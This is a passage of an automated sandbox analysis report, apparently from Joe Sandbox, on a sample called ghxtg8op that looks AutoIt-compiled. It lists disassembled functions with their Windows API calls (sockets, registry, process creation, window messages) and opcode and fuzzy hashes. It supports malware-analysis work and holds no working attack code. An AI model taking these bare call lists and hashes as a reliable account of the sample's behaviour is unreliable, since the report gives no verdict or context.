                            • API ID: EnumFreeLibrary$CloseDeleteOpen
                            • String ID:
                            • API String ID: 395352322-0
                            • Opcode ID: 15ec7d8a54c252d80952f5921ddf1c869e85ca5e67a6cd74b483b14c3ae212bc
                            • Instruction ID: a4595321948a452c062ab4e4dac326d2df9c2693c7ffa997ece82e59c0454c2e
                            • Opcode Fuzzy Hash: 15ec7d8a54c252d80952f5921ddf1c869e85ca5e67a6cd74b483b14c3ae212bc
                            • Instruction Fuzzy Hash: F5311D7590021ABFDB15DF90DC89EFEB7BCEF09300F144169E511E3241D6749E89AAB0
                            Function 00DC62CD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                            Download Yara Rule
                            APIs
                            • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00DC62EC
                            • GetWindowLongW.USER32(00932440,000000F0), ref: 00DC631F
                            • GetWindowLongW.USER32(00932440,000000F0), ref: 00DC6354
                            • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00DC6386
                            • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00DC63B0
                            • GetWindowLongW.USER32(00000000,000000F0), ref: 00DC63C1
                            • SetWindowLongW.USER32(00000000,000000F0,00000000,?,?,?,00DC9E3C,?,?,?,?), ref: 00DC63DB
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: LongWindow$MessageSend
                            • String ID:
                            • API String ID: 2178440468-0
                            • Opcode ID: d66cf0cfa38a3bb80921d1e2bbfab5dc0341962b8acfadac79feac4e78e059d1
                            • Instruction ID: 9ad370e8791d59ea67726d3347aec41e50128a0eda1f8b1a7d1e2d238c76216f
                            • Opcode Fuzzy Hash: d66cf0cfa38a3bb80921d1e2bbfab5dc0341962b8acfadac79feac4e78e059d1
                            • Instruction Fuzzy Hash: 0B31F031644292AFDB208F59DC84F9537E1FB5A714F1D41A8FA01DF2B2CB72E8849B61
                            Function 00D9DAEB Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON
                            Download Yara Rule
                            APIs
                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00D9DB2E
                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00D9DB54
                            • SysAllocString.OLEAUT32(00000000), ref: 00D9DB57
                            • SysAllocString.OLEAUT32(?), ref: 00D9DB75
                            • SysFreeString.OLEAUT32(?), ref: 00D9DB7E
                            • StringFromGUID2.OLE32(?,?,00000028), ref: 00D9DBA3
                            • SysAllocString.OLEAUT32(?), ref: 00D9DBB1
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                            • String ID:
                            • API String ID: 3761583154-0
                            • Opcode ID: 9c335a14d681d4153cd6f4c68e16c382633c4cc2bd2cd25ed0db38226eb3751e
                            • Instruction ID: ddf0017c3534015f26cf3a354efa700e235fb62a1766a59c04df61369f7792eb
                            • Opcode Fuzzy Hash: 9c335a14d681d4153cd6f4c68e16c382633c4cc2bd2cd25ed0db38226eb3751e
                            • Instruction Fuzzy Hash: E221907660421AAFDF10DFA8DC88CFB77AEEB09364B058526F958DB260D674DC418B70
                            Function 00DB6173 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00DB7D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00DB7DB6
                            • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00DB61C6
                            • WSAGetLastError.WSOCK32(00000000), ref: 00DB61D5
                            • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00DB620E
                            • connect.WSOCK32(00000000,?,00000010), ref: 00DB6217
                            • WSAGetLastError.WSOCK32 ref: 00DB6221
                            • closesocket.WSOCK32(00000000), ref: 00DB624A
                            • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00DB6263
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                            • String ID:
                            • API String ID: 910771015-0
                            • Opcode ID: 44f03229f27c0052911ab1d76377e0ab89fc1fcffa1c2cdcacec995fda5d7df5
                            • Instruction ID: a60322dc49b31964d26c2c995eabdd293920b541e6f821de1d9e0e8c39055cf3
                            • Opcode Fuzzy Hash: 44f03229f27c0052911ab1d76377e0ab89fc1fcffa1c2cdcacec995fda5d7df5
                            • Instruction Fuzzy Hash: 08316B71600219ABEF10AF68CC85FFE7BA9EF45764F044029F906E7291DB74ED048AB1
                            Function 00D9F65E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: __wcsnicmp
                            • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                            • API String ID: 1038674560-2734436370
                            • Opcode ID: ae3a8a0df20d54b671aeb898052e4f864c4ce5851530fd124d354d3a81ca8b5c
                            • Instruction ID: b22ea8b6d19900dca040dbb1968710968bd5ec93c4c516b8309a2ba654f46bd8
                            • Opcode Fuzzy Hash: ae3a8a0df20d54b671aeb898052e4f864c4ce5851530fd124d354d3a81ca8b5c
                            • Instruction Fuzzy Hash: AA21F6722046117BDB20AB34AC02FB77398EF55354F18483AF986C6191EB61ED46D2B5
                            Function 00D9DBC4 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON
                            Download Yara Rule
                            APIs
                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00D9DC09
                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00D9DC2F
                            • SysAllocString.OLEAUT32(00000000), ref: 00D9DC32
                            • SysAllocString.OLEAUT32 ref: 00D9DC53
                            • SysFreeString.OLEAUT32 ref: 00D9DC5C
                            • StringFromGUID2.OLE32(?,?,00000028), ref: 00D9DC76
                            • SysAllocString.OLEAUT32(?), ref: 00D9DC84
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                            • String ID:
                            • API String ID: 3761583154-0
                            • Opcode ID: f128488f7dee729e1ac4540c439a2182f05a707bb4bc8a8ac94627ab0d61794c
                            • Instruction ID: 691ae2bb5123fbbe940a9c269856e7285dd9497d184f6bee77ac3870e928d1e5
                            • Opcode Fuzzy Hash: f128488f7dee729e1ac4540c439a2182f05a707bb4bc8a8ac94627ab0d61794c
                            • Instruction Fuzzy Hash: 63214175604206AF9F14DFA8DC88DAB77EDEB0D360B148125F955CB261DAB0DC41CB74
                            Function 00DC75CD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00D41D35: CreateWindowExW.USER32 ref: 00D41D73
                              • Part of subcall function 00D41D35: GetStockObject.GDI32(00000011), ref: 00D41D87
                              • Part of subcall function 00D41D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00D41D91
                            • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00DC7632
                            • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00DC763F
                            • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00DC764A
                            • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00DC7659
                            • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00DC7665
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: MessageSend$CreateObjectStockWindow
                            • String ID: Msctls_Progress32
                            • API String ID: 1025951953-3636473452
                            • Opcode ID: 906ba54a8dddd0c1b2822fd2d758c0f5ab6b131dcca0366737e06efee64409d4
                            • Instruction ID: 0e94c7d3fb0a022f77a1baabd0c9a5c1acdd2cd79dade323f88af6214cdb3534
                            • Opcode Fuzzy Hash: 906ba54a8dddd0c1b2822fd2d758c0f5ab6b131dcca0366737e06efee64409d4
                            • Instruction Fuzzy Hash: E71190B215021ABFEF118F64CC85EE7BF6DEF08798F014115BA04A20A0CA729C21DBB4
                            Function 00D69AE6 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                            Download Yara Rule
                            APIs
                            • __init_pointers.LIBCMT ref: 00D69AE6
                              • Part of subcall function 00D63187: RtlEncodePointer.NTDLL(00000000), ref: 00D6318A
                              • Part of subcall function 00D63187: __initp_misc_winsig.LIBCMT ref: 00D631A5
                              • Part of subcall function 00D63187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00D69EA0
                              • Part of subcall function 00D63187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00D69EB4
                              • Part of subcall function 00D63187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00D69EC7
                              • Part of subcall function 00D63187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00D69EDA
                              • Part of subcall function 00D63187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00D69EED
                              • Part of subcall function 00D63187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00D69F00
                              • Part of subcall function 00D63187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00D69F13
                              • Part of subcall function 00D63187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00D69F26
                              • Part of subcall function 00D63187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00D69F39
                              • Part of subcall function 00D63187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00D69F4C
                              • Part of subcall function 00D63187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00D69F5F
                              • Part of subcall function 00D63187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00D69F72
                              • Part of subcall function 00D63187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00D69F85
                              • Part of subcall function 00D63187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00D69F98
                              • Part of subcall function 00D63187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00D69FAB
                              • Part of subcall function 00D63187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00D69FBE
                            • __mtinitlocks.LIBCMT ref: 00D69AEB
                            • __mtterm.LIBCMT ref: 00D69AF4
                              • Part of subcall function 00D69B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00D69AF9,00D67CD0,00DFA0B8,00000014), ref: 00D69C56
                              • Part of subcall function 00D69B5C: _free.LIBCMT ref: 00D69C5D
                              • Part of subcall function 00D69B5C: DeleteCriticalSection.KERNEL32(02,?,?,00D69AF9,00D67CD0,00DFA0B8,00000014), ref: 00D69C7F
                            • __calloc_crt.LIBCMT ref: 00D69B19
                            • __initptd.LIBCMT ref: 00D69B3B
                            • GetCurrentThreadId.KERNEL32(00D67CD0,00DFA0B8,00000014), ref: 00D69B42
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                            • String ID:
                            • API String ID: 3567560977-0
                            • Opcode ID: e1d5ea989e9c3ac1ce9bb9d0d4f9c87c81c29a561dae2b20fcc9b823f3cdbcff
                            • Instruction ID: bbed6f5612dd8a3d15b47c7d24dd1cd94226a1616b06f6e640aac3a07cf75b01
                            • Opcode Fuzzy Hash: e1d5ea989e9c3ac1ce9bb9d0d4f9c87c81c29a561dae2b20fcc9b823f3cdbcff
                            • Instruction Fuzzy Hash: 9AF090326097125BEA347BB8BC23A9AB7DDDF02730F244A2AF460C61D2EF70844149B0
                            Function 00DCB635 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40processCOMMON
                            Download Yara Rule
                            APIs
                            • _memset.LIBCMT ref: 00DCB644
                            • _memset.LIBCMT ref: 00DCB653
                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00E06F20,00E06F64), ref: 00DCB682
                            • CloseHandle.KERNEL32 ref: 00DCB694
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: _memset$CloseCreateHandleProcess
                            • String ID: o$do
                            • API String ID: 3277943733-2180341428
                            • Opcode ID: 1497391920498771d8a5e37591271ef983f5fdb374150daa2bc6366a3ac8a50e
                            • Instruction ID: 995e05c0c5f054dac97eca15d16987d060f87700595be9e784fa623bd4e0be70
                            • Opcode Fuzzy Hash: 1497391920498771d8a5e37591271ef983f5fdb374150daa2bc6366a3ac8a50e
                            • Instruction Fuzzy Hash: 85F0F4B16403077FE2102B65BC06FBB7A9CEB55795F004021FA08F5191DB765C648BB8
                            Function 00D6406B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00D63F85), ref: 00D64085
                            • GetProcAddress.KERNEL32(00000000), ref: 00D6408C
                            • EncodePointer.KERNEL32(00000000), ref: 00D64097
                            • DecodePointer.KERNEL32(00D63F85), ref: 00D640B2
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                            • String ID: RoUninitialize$combase.dll
                            • API String ID: 3489934621-2819208100
                            • Opcode ID: a6508bd26581d1d39586318fa3facd0325e82656eedee92a06564ba7993b775f
                            • Instruction ID: a3265f07397c02186a57fd72aa48f7f49dcdcf166639f3bd11c1b612fd345768
                            • Opcode Fuzzy Hash: a6508bd26581d1d39586318fa3facd0325e82656eedee92a06564ba7993b775f
                            • Instruction Fuzzy Hash: 13E0BF70582302EFDB109F72EC0DF553AAAB718742F144026F101E12A4CBB74648CA34
                            Function 00DA64B8 Relevance: 9.2, APIs: 6, Instructions: 205COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: _memmove$__itow__swprintf
                            • String ID:
                            • API String ID: 3253778849-0
                            • Opcode ID: eff7f4e5f5b6e760b2da2a9c47064d3ee6628312d1e99789fb4305ac86d0cacb
                            • Instruction ID: ee9d440a18ac490060c77d6f715b3ff1af18a19e798df1f3fb8b5e80e6258671
                            • Opcode Fuzzy Hash: eff7f4e5f5b6e760b2da2a9c47064d3ee6628312d1e99789fb4305ac86d0cacb
                            • Instruction Fuzzy Hash: 37617A3090025A9BCF11EF64CC92AFF7BA5EF46308F084959F8596B292DB35E915CB70
                            Function 00DC01E4 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00D47DE1: _memmove.LIBCMT ref: 00D47E22
                              • Part of subcall function 00DC0E1A: CharUpperBuffW.USER32(?,?), ref: 00DC0E31
                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00DC02BD
                            • RegOpenKeyExW.ADVAPI32 ref: 00DC02FD
                            • RegCloseKey.ADVAPI32(?), ref: 00DC0320
                            • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00DC0349
                            • RegCloseKey.ADVAPI32(?), ref: 00DC038C
                            • RegCloseKey.ADVAPI32(00000000), ref: 00DC0399
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                            • String ID:
                            • API String ID: 4046560759-0
                            • Opcode ID: 5d4f9c607dd4ecab006a5c8a6862b03266893628cc6f135f8e1c34084040d920
                            • Instruction ID: 60bc33ddada089bc41a26cee3de5d30f75baa728050381055c73fc59be4b9a5b
                            • Opcode Fuzzy Hash: 5d4f9c607dd4ecab006a5c8a6862b03266893628cc6f135f8e1c34084040d920
                            • Instruction Fuzzy Hash: 1C512731208241AFCB14EF64C885EAEBBE9FF85714F04491DF595872A2DB31E905DB72
                            Function 00DC5799 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON
                            Download Yara Rule
                            APIs
                            • GetMenu.USER32(?,00000001,00000000), ref: 00DC57FB
                            • GetMenuItemCount.USER32(00000000), ref: 00DC5832
                            • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00DC585A
                            • GetMenuItemID.USER32(?,?), ref: 00DC58C9
                            • GetSubMenu.USER32(?,?), ref: 00DC58D7
                            • PostMessageW.USER32 ref: 00DC5928
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Menu$Item$CountMessagePostString
                            • String ID:
                            • API String ID: 650687236-0
                            • Opcode ID: 961f11a02e51b9f67dd37f4475cdd18b80ace64cb2b0d01d0ded7cafa2f7172b
                            • Instruction ID: 569936c70b9d67bc74f09fb783bdbfb352e828f5a2db4cb02a8eecd62b5d5c9f
                            • Opcode Fuzzy Hash: 961f11a02e51b9f67dd37f4475cdd18b80ace64cb2b0d01d0ded7cafa2f7172b
                            • Instruction Fuzzy Hash: C1513B35A00616AFCF15DF64D845EAEBBB5EF48720F144069E842BB351CB75AE818BB0
                            Function 00D9EEEC Relevance: 9.2, APIs: 6, Instructions: 159COMMON
                            Download Yara Rule
                            APIs
                            • VariantInit.OLEAUT32(?), ref: 00D9EF06
                            • VariantClear.OLEAUT32(00000013), ref: 00D9EF78
                            • VariantClear.OLEAUT32(00000000), ref: 00D9EFD3
                            • _memmove.LIBCMT ref: 00D9EFFD
                            • VariantClear.OLEAUT32(?), ref: 00D9F04A
                            • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00D9F078
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Variant$Clear$ChangeInitType_memmove
                            • String ID:
                            • API String ID: 1101466143-0
                            • Opcode ID: d45917a05f7f3ecd69c4a1a074808ad8d92bd5977c8647914a5599e19cb4310e
                            • Instruction ID: bed089f31ffc9d0fab45abd6fbd8fef582319ebd5b4a6a93c85d5490aea429c0
                            • Opcode Fuzzy Hash: d45917a05f7f3ecd69c4a1a074808ad8d92bd5977c8647914a5599e19cb4310e
                            • Instruction Fuzzy Hash: 44514BB5A00209EFDB14CF58C884AAAB7B9FF4C314B15856AE959DB301E335E911CFA0
                            Function 00DA220A Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                            Download Yara Rule
                            APIs
                            • _memset.LIBCMT ref: 00DA2258
                            • GetMenuItemInfoW.USER32 ref: 00DA22A3
                            • IsMenu.USER32(00000000), ref: 00DA22C3
                            • CreatePopupMenu.USER32 ref: 00DA22F7
                            • GetMenuItemCount.USER32(000000FF), ref: 00DA2355
                            • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00DA2386
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                            • String ID:
                            • API String ID: 3311875123-0
                            • Opcode ID: d804c465617655cbe5f92caa39e658f5a25ecce734c26ac206b760959234a527
                            • Instruction ID: be3c45781319ef9829a9becc684f59debd7e66bdd8af23c41c170e10d868d85e
                            • Opcode Fuzzy Hash: d804c465617655cbe5f92caa39e658f5a25ecce734c26ac206b760959234a527
